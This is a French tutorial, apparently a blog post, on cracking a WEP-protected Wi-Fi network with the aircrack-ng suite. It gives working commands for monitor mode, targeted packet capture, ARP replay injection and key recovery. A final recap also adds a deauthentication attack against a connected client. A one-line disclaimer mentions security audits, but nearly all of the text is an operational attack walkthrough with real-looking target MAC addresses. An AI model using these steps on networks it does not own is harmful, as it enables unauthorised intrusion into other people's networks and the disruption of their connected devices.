Aujourd'hui je vais vous montrer comment cracker un réseau sans fil protégé avec une clef WEP peu importe sa taille, et pourquoi faire ? disant dans le cadre d’un audit de sécurité par exemple et non pas pour nuire à vos voisins, vous êtes avertis ! pour faire, nous utiliserons la suite air crack-ng disponible dans la distribution Linux BackTrack afin de gagner du temps.
Prérequis:
- Une carte Wifi compatible avec le mode monitoring et injection de paquets (lien)
- La suite air crack-ng (lien) disponible dans la distribution BackTrack (lien)
On commence:
1 – Démarrage de l’interface Wifi (wlan0) en mode monitor, afin d’intercepter le trafic réseau sans fil, même s’il n’est pas adressé à notre machine.
air mon-ng start wlan0
2 – Démarrage d’un scan des réseaux sans fil disponibles, dans mon cas en utilisant l’interface mon0
airodump-ng mon0
3 – Maintenant que j’ai les informations (et paramètres) du réseau sans fil ciblé :
ESSID : dark-box
BSSID : 00:1C:C5:0A:5C:05
Channel (CH) : 11
Je vais arrêter la précédente commande, et lancer une nouvelle plus précise avec les nouveaux paramètres, tout en enregistrant le trafic capturé dans un fichier output
1
#commande:
2
airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
3
4
# explication:
5
airodump-ng
--channel {numéro du channel} --write {nom du fichier de capture}
--bssid {adresse MAC wifi du routeur} {interface wifi en mode
monitoring}
4 – Dans une nouvelle console, je vais procéder à l’injection de paquets ARP (aireplay) pour stimuler le réseau et accélérer la capture des IVs nécessaires pour la réussite de l’attaque.
1
# commande:
2
aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
3
4
# explication:
5
aireplay-ng
--arpreplay -e {ESSID du routeur} -b {adresse MAC wifi du routeur} -h
{adresse MAC wifi d'une station connectée au routeur} {interface wifi en
mode monitor}
5 – Dans une autre nouvelle console, je lance air crack pour casser la clef WEP en définissant le fichier de capture output*.cap
1 air crack-ng output*.cap
laissé tourner, et en moins de 10 minutes vous obtiendrez la clef WEP, ici dans mon cas elle a une longueur de 128 bits, et je peux l’utiliser par la suite pour me connecter au réseau Wifi attaqué.
Récapitulatif des commandes :
1-root@imbh:~# airmon-ng start wlan0 2-root@imbh:~# airodump-ng mon0 3-root@imbh:~# airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0 4-root@imbh:~# aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0 5-root@imbh:~# aireplay-ng --deauth 10 -a 00:1C:C5:0A:5C:05 -c 00:1C:BF:AB:35:B5 mon0 6-root@imbh:~# aircrack-ng output*.cap